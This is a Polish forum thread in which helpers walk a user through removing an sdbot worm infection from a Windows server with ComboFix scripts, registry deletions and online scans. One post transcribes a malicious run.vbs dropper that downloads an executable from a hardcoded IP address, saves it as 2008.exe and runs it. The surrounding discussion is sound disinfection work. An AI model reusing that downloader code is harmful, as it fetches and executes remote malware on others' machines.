Wirus w32/sdbot.worm!ftp


(Nobisz) #1

witam,

regularnie program antywirusowy (mcafee) wyłapuje mi wirusa jak w tytule, jednocześnie wyświetla informację, że skasowano następujące pliki:

"c:\windows\system32\eq" oraz w tym samym katalogu plik "z". Pełne skanowanie sytemu nic nie znajduje, Pobrałem taki programik prevx csi, który znalazł natępujące wirusy:

c:\windows\system32\iasex.dll opis trojan.dos.win32

c:\windows\system32\remote.dll opis generic.malware

c:\windows\system32\swreg.exe opis genericmalware

Zakładam, że to co znajduje mcafee to skutek działania trojana, poniżej zamieszczam log z hjt i proszę o pomoc:

http://wklej.org/id/2d324a8761


(JNJN) #2

Proszę przeczytać tematy przyklejone w tym dziale i poprawić posta, opcja edytuj. JNJN


(Gutek) #3
C:\DOCUME~1\ADMINI~1\USTAWI~1\Temp\Set4B64.tmp

O23 - Service: FireDaemon Service: RsvTermAdvise (RsvTermAdvise) - Unknown owner - c:WINDOWSsystem32CatRoot{b750E6i3-38EE-11a1-85E5-00C04nC295EE}Cat\mssvchos t.exe

Start >>> Uruchom >>> services.msc >>> zatrzymaj i wyłącz FireDaemon Service i usuń wpisy HJT

Daj log z ComboFix


(Nobisz) #4

więc tak:

zatrzymałem usługę i wyłączyłem, dałem fix i po skanowaniu zniknął wpis w hjt, ale w usługach firedaemon dalej istnieje, nie pokazuje się w hjt tylko dlatego, że usługa jest wyłączona.

prevx dalej wykrywa to samo.

Combofix coś naprawiał wyąłczył serwer, ale dalej to samo, log :http://www.wklej.org/id/6edc5ede31


(Gutek) #5

Wklej do Notatnika:

File::

C:\WINDOWS\system32\drivers\schost.sys 

C:\WINDOWS\system32\drivers\pxark.sys

C:\WINDOWS\system32\_regrse.exe 

C:\WINDOWS\system32\Remote.dll 

C:\WINDOWS\system32\www.exe

C:\WINDOWS\system32\sysme.bat 

C:\WINDOWS\system32\tencent.sys 

C:\WINDOWS\system32\drivers\spoolvc.sys 

C:\WINDOWS\system32\suo32.dll


Driver::

pxark

>>Plik>>Zapisz jako... >>> CFScript (najwygodniej będzie, jeśli zapiszesz w takiej lokalizacji, by ikonka CFScript.txt znalazła się obok ikonki ComboFix.exe )

Przeciągnij i upuść plik CFScript.txt na plik ComboFix.exe (czyli ikonkę CFScript.txt na ikonkę ComboFix.exe )

– podobnie jak na tym obrazku -->88953CFScript-createdbyMiekiemoes.gif

(jeśli pojawi się pytanie " 1 or 2" - to wpisz 1 i naciśnij ENTER) Ma się rozpocząć usuwanie. (i powstanie log)

Po restarcie usuń ręcznie folder C: **** Qoobox.

Po tym nowy log z Combo

Poza tym - Pobierz program SDFix

-


(Nobisz) #6

po kolei:

plik notatnika stworzony przeniesiony na combofixa i poszło,

zresetował komputer,

loga nie utworzył

usunąłem c:\qoobox

nowy log z combo http://www.wklej.org/id/8bd9bd4da9

sdfix rozpakowany

system w trybie awaryjnym

klikam runthis.bat i nic

Nawet próbowałem odpalić linię komend i ręcznie wisać czy wyświetla się jakiś komunikat - nic. Czy sdfix tworzy jakis log, w którym zapisuje co zrobił lub czemu nie zrobił?

Dobra wiadomość - prevxcsi wykrywa już tylko 2 sztuki:

c:\windows\system32\iasex.dll typ sze

c:\windows\system32swreg.exe typ generic.malware

Nie dodałem, ale pewnie zorientowałeś się po logach, że system to sbs2003, może dlatego sdfix nie chce ruszyć?


(Nobisz) #7

walka do końca, nie format:) dzisiaj już praktycznie co klika minut wyskakuje monit mcafee o usuniętym wirusie lub koniu trojańskim:(


(Gutek) #8

Opis - SDFix viewtopic.php?f=16&t=36654

Wklej do Notatnika:

Registry::

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 

"BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}"=-

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 

"licencje klient"=-

>>Plik>>Zapisz jako... >>> CFScript (najwygodniej będzie, jeśli zapiszesz w takiej lokalizacji, by ikonka CFScript.txt znalazła się obok ikonki ComboFix.exe )

Przeciągnij i upuść plik CFScript.txt na plik ComboFix.exe (czyli ikonkę CFScript.txt na ikonkę ComboFix.exe )

– podobnie jak na tym obrazku -->88953CFScript-createdbyMiekiemoes.gif

(jeśli pojawi się pytanie " 1 or 2" - to wpisz 1 i naciśnij ENTER) Ma się rozpocząć usuwanie. (i powstanie log)

Po restarcie usuń ręcznie folder C: **** Qoobox.

Po tym nowy log z Combo

Przeskanuj C:\WINDOWS\system32\drivers\schost.sys~ na http://virusscan.jotti.org/


(Nobisz) #9

poczytałem twój link o sdfix. Piszą, że jest do xp i 2000, żaden z 3 problemów opisanych na stronie:

http://downloads.andymanchesta.com/Remo ... ReadMe.htm u mnie nie występuje

Poszperałem trochę w tym runthis.bat i znalazłem takie warunki:

ver|%systemroot%\system32\find.exe "Windows XP">nul && set TypeOS=XP

if [%TypeOS%]==[XP] goto Start

ver|%systemroot%\system32\find.exe "Windows 2000">nul && set TypeOS=W2K

if [%TypeOS%]==[W2K] goto Start

goto end

Przypuszczam, że tutaj sbs2003 nie przechodzi weryfikacji i sdfix kończy pracę, mogę to tak zmodyfikować, żeby nie sprawdzał systemu i poleciał na sbs2003, czy to będzie bezpieczne?

Klucze do usunięcia dla combifix usunąłem log po usuwaniu tutaj:http://www.wklej.org/id/a8b81ca054

log po resecie tytaj:http://www.wklej.org/id/9df20bdaad

Te dwa wpisy raczej nie były groźne, ale są wykluczone.

Combo często usuwa mi plik 2008.exe

w katalogu system32 pojawia się plik run.vbs o takiej zawartości: http://www.wklej.org/id/37a7416565

tłumacząc na nasze, żeby oszczędzić Tobie cenny czas, który mi poświęcasz:

set oshell = wscript.createobject (Wscript.shell)

Set xPost = CreateObject(Microsoft.XMLHTTP)

xPost.Open GEThttp://61.162.230.146/1.exe0

xPost.Send()

Set sGet = CreateObject(ADODB.Stream)

sGet.Mode = 3

sGet.Type = 1

sGet.Open()

sGet.Write(xPost.responseBody)

sGet.SaveToFile 2008.exe2

oshell.run 2008.exe

nie znam się na skryptach, ale chyba wychodzi na to, że pobiera sobie z netu plik i zapisuje go jako 2008.exe

Te pliki kasuje combofix, skryptu, żaden program nie uważa za wirusa, a o pliku tworzącym skrypt to juz w ogóle cisza.

Ten link virusscan.lotti jest rewelacyjny, skanuję wszystkie pliki, które wydają mi się podejrzane. Pliku schost.sys~ już nie przeskanuję, bo w akcie desperacji wyciąłem go wczoraj:)

Tutaj alerty mcafee z ostatnich kilku dni:http://www.wklej.org/id/8f0f3f4ed0

Powoli kończą mi się pomysły, a do tego serwer w ciągu dnia musi hulać, myślisz, że to się rozłazi w sieci, na razie żadna stacja nic nie zgłasza:(


(Gutek) #10

Zrób skan Trend Micro - http://pl.trendmicro-europe.com/consume ... launch.php i powiedź co wykrył.

Wklej do Notatnika:

File::

C:\WINDOWS\system32\Red3w2Girl.exe 

C:\WINDOWS\system32\run.vbs

>>Plik>>Zapisz jako... >>> CFScript (najwygodniej będzie, jeśli zapiszesz w takiej lokalizacji, by ikonka CFScript.txt znalazła się obok ikonki ComboFix.exe )

Przeciągnij i upuść plik CFScript.txt na plik ComboFix.exe (czyli ikonkę CFScript.txt na ikonkę ComboFix.exe )

– podobnie jak na tym obrazku -->88953CFScript-createdbyMiekiemoes.gif

(jeśli pojawi się pytanie " 1 or 2" - to wpisz 1 i naciśnij ENTER) Ma się rozpocząć usuwanie. (i powstanie log)

Po restarcie usuń ręcznie folder C: **** Qoobox.


(Nobisz) #11

usunąłem obydwa pliki, mcafee nadal zgłasza, że w pliku c:\windows\system32\ftp.exe znaleziono W32/sdbot.worm!ftp. Usunąłem juz nawet ftp.exe ale on sie odbudowuje tak samo run.vbs

Trendmicro znalazł jednego wirusa i wyczyścił, zgłosił też 2 luki w zabezpieczeniach servera sql, próbuję zainstalować łaty, ale coś nie wchodzą.